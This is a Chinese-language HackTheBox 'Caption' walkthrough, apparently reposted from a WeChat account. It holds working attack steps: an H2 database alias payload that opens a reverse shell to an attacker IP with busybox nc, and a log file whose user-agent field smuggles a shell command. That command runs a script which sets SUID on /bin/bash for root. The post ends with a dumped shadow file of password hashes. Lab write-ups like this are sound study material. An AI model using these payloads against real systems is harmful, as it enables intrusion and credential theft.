HTB-Caption笔记(水文版)

admin 2024年9月19日13:18:27评论38 views字数 3014阅读10分2秒阅读模式

HTB-Caption笔记(水文版)

扫描靶机

nmap -T4 -A -v 10.10.11.33

HTB-Caption笔记(水文版)

扫描出了5个端口,有个域名caption.htb,然后打开80看看

HTB-Caption笔记(水文版)

这挺好看的,geishell后保存网站~,可惜没有账号密码,再看看8080端口

HTB-Caption笔记(水文版)

HTB-Caption笔记(水文版)

随便浏览一下,点击右上角的system administration,可以看到一个可编写的数据库

HTB-Caption笔记(水文版)

HTB-Caption笔记(水文版)

可以参考这篇文章getshell

https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\A"); return s.hasNext() ? s.next() : ""; }$$;CALL SHELLEXEC('busybox nc 10.10.14.xx 9999 -e sh')

HTB-Caption笔记(水文版)

HTB-Caption笔记(水文版)

这样就成功的拿到了user flag,为了方便,先使用ssh-keyget -t rsa生成密钥,然后ssh登录

HTB-Caption笔记(水文版)

可以看到后台有个9090端口,代理出来,9090端口是无法打开的,接下来提权,先创建一个malicious.log,然后再创建一个sh文件,内容是这些,东西都放在靶机/tmp上

malicious.log127.0.0.1 "user-agent":"'; /bin/bash /tmp/payload.sh #"payload.shchmod +s /bin/bashlog_service.thriftnamespace go log_serviceservice LogService { string ReadLogFile(1: string filePath)}

这里可以安装

https://thrift-tutorial.readthedocs.io/en/latest/installation.html

apt install thrift-compilerthrift -r --gen py log_service.thrift

然后进入到gen文件夹,创建一个client脚本

from thrift import Thriftfrom thrift.transport import TSocketfrom thrift.transport import TTransportfrom thrift.protocol import TBinaryProtocolfrom log_service import LogService  # 导入生成的Thrift客户端代码def main():    # 设置到服务器的传输    transport = TSocket.TSocket('localhost', 9090)    # 使用缓冲传输提高性能    transport = TTransport.TBufferedTransport(transport)    # 使用二进制协议    protocol = TBinaryProtocol.TBinaryProtocol(transport)    # 创建客户端以使用服务    client = LogService.Client(protocol)    # 打开连接    transport.open()    try:        # 指定要处理的日志文件路径        log_file_path = "/tmp/malicious.log"        # 调用远程方法ReadLogFile并获取结果        response = client.ReadLogFile(log_file_path)        print("服务器响应:", response)    except Thrift.TException as tx:        # 捕获Thrift异常        print(f"Thrift异常: {tx}")    # 关闭传输    transport.close()if __name__ == '__main__':    main()

HTB-Caption笔记(水文版)

然后在靶机上运行bash -p

HTB-Caption笔记(水文版)

root:$y$j9T$Z0mAEpyXxUFgbF4zyQYIm0$tfEWxKHM9Yv0fztCJ6GT/RYj87nvBZIl3t8ssYc3GnB:19956:0:99999:7:::daemon:*:19405:0:99999:7:::bin:*:19405:0:99999:7:::sys:*:19405:0:99999:7:::sync:*:19405:0:99999:7:::games:*:19405:0:99999:7:::man:*:19405:0:99999:7:::lp:*:19405:0:99999:7:::mail:*:19405:0:99999:7:::news:*:19405:0:99999:7:::uucp:*:19405:0:99999:7:::proxy:*:19405:0:99999:7:::www-data:*:19405:0:99999:7:::backup:*:19405:0:99999:7:::list:*:19405:0:99999:7:::irc:*:19405:0:99999:7:::gnats:*:19405:0:99999:7:::nobody:*:19405:0:99999:7:::_apt:*:19405:0:99999:7:::systemd-network:*:19405:0:99999:7:::systemd-resolve:*:19405:0:99999:7:::messagebus:*:19405:0:99999:7:::systemd-timesync:*:19405:0:99999:7:::pollinate:*:19405:0:99999:7:::sshd:*:19405:0:99999:7:::syslog:*:19405:0:99999:7:::uuidd:*:19405:0:99999:7:::tcpdump:*:19405:0:99999:7:::tss:*:19405:0:99999:7:::landscape:*:19405:0:99999:7:::fwupd-refresh:*:19405:0:99999:7:::usbmux:*:19474:0:99999:7:::lxd:!:19474::::::haproxy:!:19788:0:99999:7:::varnish:*:19788:0:99999:7:::vcache:*:19788:0:99999:7:::varnishlog:*:19788:0:99999:7:::margo:$y$j9T$1.nErPXvyX8GM8SBRu8/B1$rCxIQkAu/A5K6b5xIZBJ6oeKfPp6R3WHDds/Z1OTEZ8:19956:0:99999:7:::ruth:$y$j9T$8eN6xHfvLg4evyRqa2g7l1$AgJWIup1DAeX.Vo1wr69..LMTys7hBGepHknEKPwMOB:19960:0:99999:7:::_laurel:!:19965::::::

原文始发于微信公众号(Jiyou too beautiful):HTB-Caption笔记(水文版)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月19日13:18:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTB-Caption笔记(水文版)https://cn-sec.com/archives/3180890.html

发表评论

匿名网友 填写信息